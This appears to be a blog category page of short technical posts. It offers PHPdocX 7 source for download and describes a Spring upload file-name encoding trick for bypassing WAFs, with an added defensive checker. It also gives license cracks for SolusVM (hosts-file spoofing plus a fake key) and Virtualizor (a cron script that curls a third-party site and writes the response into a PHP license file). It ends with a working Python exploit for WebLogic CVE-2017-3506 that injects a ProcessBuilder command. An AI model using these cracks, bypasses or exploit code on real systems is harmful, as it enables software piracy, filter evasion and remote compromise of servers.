Articles in the category "Technical"

PHPdocX7 Source code

====PHPdocX 7 by 2mdc.com==== https://www.phpdocx.com/

PHPDOCX is a PHP library designed to dynamically generate reports in
Word format (WordprocessingML).

The reports may be built from any available data source like a MySQL
database or a spreadsheet. The resulting documents remain fully
editable in Microsoft Word (or any other compatible software like
OpenOffice) and therefore the final users are able to modify them as
necessary.

The formatting capabilities of the library allow the programmers to
generate dynamically and programmatically all the standard rich
formatting of a typical word processor.

This library also provides an easy method to generate documents in
other standard formats such as PDF or HTML.


phpdocx can fill data into a Word template and generate a new Word document. For usage details, see the official documentation:

https://www.phpdocx.com/documentation

Download: phpdocx7.zip

Git repository: phpdocx7-git

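Spring MVC MultipartResolver feature: QP encoding

While reading Spring's multipart handling today, I came across a rather odd piece of code:

[Image: 20180803094501_282.png]
The odd part is why Spring gives special treatment to "=?" and "?=". Following the code shows that this is QP encoding, which is used to solve the encoding problem for attachments in e-mail. Spring calls the Java mail API to apply QP encoding to the file name of an uploaded attachment.

Now that this Spring feature is known, in some cases it may be possible to bypass the defenses of traditional WAFs and CDNs by encoding the file name.

Generating the special file name with the Java mail library:
[Image: 2.png]

Uploading the file with the encoded name:

[Image: 3.png]

Spring decodes it:
[Image: 4.png]

Original article: http://p2j.cn/?p=1868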
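A defensive sketch of the point above, added here and not part of the original post: an upload filter has to decode encoded-word file names (the RFC 2047 `=?charset?Q|B?...?=` form) before checking the extension, otherwise it inspects a different name than the one Spring ends up with. Python's `email` library stands in for the Java mail decoder; `BLOCKED_EXT`, the function names and the sample headers are constructed for the example.

```python
import os
import re
from email.errors import HeaderParseError
from email.header import decode_header

BLOCKED_EXT = {".jsp", ".jspx", ".war"}  # constructed policy for this example
FILENAME_RE = re.compile(r'filename="([^"]*)"', re.IGNORECASE)

def decode_encoded_words(value):
    """Decode =?charset?Q|B?text?= words; plain text passes through unchanged."""
    parts = []
    for chunk, charset in decode_header(value):
        if isinstance(chunk, bytes):
            try:
                chunk = chunk.decode(charset or "ascii", errors="replace")
            except LookupError:  # charset label Python does not know
                chunk = chunk.decode("latin-1")
        parts.append(chunk)
    return "".join(parts)

def extension(name):
    return os.path.splitext(name.strip().lower())[1]

def inspect_upload(content_disposition):
    """Compare the file name as sent with the name the backend will see."""
    match = FILENAME_RE.search(content_disposition)
    if match is None:
        return None
    raw = match.group(1)
    try:
        decoded = decode_encoded_words(raw)
    except HeaderParseError:  # undecodable base64: fail closed
        return {"raw": raw, "decoded": None, "naive_block": False, "block": True}
    return {"raw": raw, "decoded": decoded,
            "naive_block": extension(raw) in BLOCKED_EXT,   # name as sent
            "block": extension(decoded) in BLOCKED_EXT}     # name after decoding

# Constructed sample headers, not captured traffic.
SAMPLES = [
    'form-data; name="file"; filename="notes.txt"',
    'form-data; name="file"; filename="=?UTF-8?Q?report=2Ejsp?="',
    'form-data; name="file"; filename="=?UTF-8?B?dXBsb2FkLmpzcA==?="',
]

if __name__ == "__main__":
    for header in SAMPLES:
        print(inspect_upload(header))
```

A result where `naive_block` is false and `block` is true marks a request whose file name only matches the policy after decoding, which is also a useful signal to log.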

SolusVM license server side

  • 1. Edit the hosts file
vi /etc/hosts
  • 2. Add the following entries
162.211.226.149     www.soluslabs.com
162.211.226.149     soluslabs.com
162.211.226.149     licensing1.soluslabs.net
162.211.226.149     licensing2.soluslabs.net
162.211.226.149     licensing3.soluslabs.net
162.211.226.149     licensing4.soluslabs.net
162.211.226.149     licensing5.soluslabs.net
162.211.226.149     licensing6.soluslabs.net
  • 3. Open the SolusVM admin panel, go to Configuration –> License, add the license key and save
SVMTL-88888-88888-88888-88888-88888-88888

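Once this is configured, upgrades work normally.

Note: reportedly the SolusVM master still quietly sends packets to a machine at OVH in France, connecting directly by IP rather than by domain name. You can try capturing that IP with tcpdump and then restricting access with iptables.
On my side I simply blocked the whole 94.0.0.0/8 range: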
iptables -I INPUT -s 94.0.0.0/8 -j DROP

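Virtualizor crack

The license verification function is in this file:

/usr/local/virtualizor/main/functions.php

One-click automatic crack script

First create the script:

vi /opt/license.sh

Then write the following into it: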

#!/bin/bash
#
# Set the license
#
chattr -i /usr/local/virtualizor/license2.php
rm -rf /usr/local/virtualizor/license2.php
IP=`curl http://members.3322.org/dyndns/getip`
LIC_URL='http://www.03sec.com/make_license.php?str='$IP
license_text=`curl $LIC_URL`
echo $license_text >> /usr/local/virtualizor/license2.php
chattr +i /usr/local/virtualizor/license2.php

Finally, add execute permission and run the script:

chmod +x /opt/license.sh && /opt/license.sh

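During testing I found that virtualizor rewrites license2.php by itself, and even chattr does not prevent it. It is recommended to set the script above up as a scheduled task that runs once an hour: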

0 * * * * /opt/license.sh

WebLogic CVE-2017-3506 Poc

Vulnerability ID

  • CVE-2017-3506 (wls-wsat remote command execution vulnerability)

Affected versions

  • Oracle WebLogic Server 10.3.6.0.0
  • Oracle WebLogic Server 12.1.3.0.0
  • Oracle WebLogic Server 12.2.1.1.0
  • Oracle WebLogic Server 12.2.1.2.0

Poc

#!/usr/bin/env python
# coding:utf-8
# auther:dayu
import requests
import re
from sys import argv

heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Content-Type': 'text/xml;charset=UTF-8'
    }

def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/wls-wsat/CoordinatorPortType'
    post_str = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <object class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="3">
                <void index="0">
                  <string>/bin/bash</string>
                </void>
                <void index="1">
                  <string>-c</string>
                </void>
                <void index="2">
                  <string>whoami</string>
                </void>
              </array>
              <void method="start"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    '''

    try:
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
        response = response.text
        response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
    except Exception, e:
        response = ""

    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
        result = "test ok"
        return result
    else:
        result = "No Vulnerability"
        return result


if __name__ == '__main__':
    if len(argv) == 1:
        print "python weblogic_poc.py url:port"
        exit(0)
    else:
        url = argv[1]
    result = poc(url=url)
    print result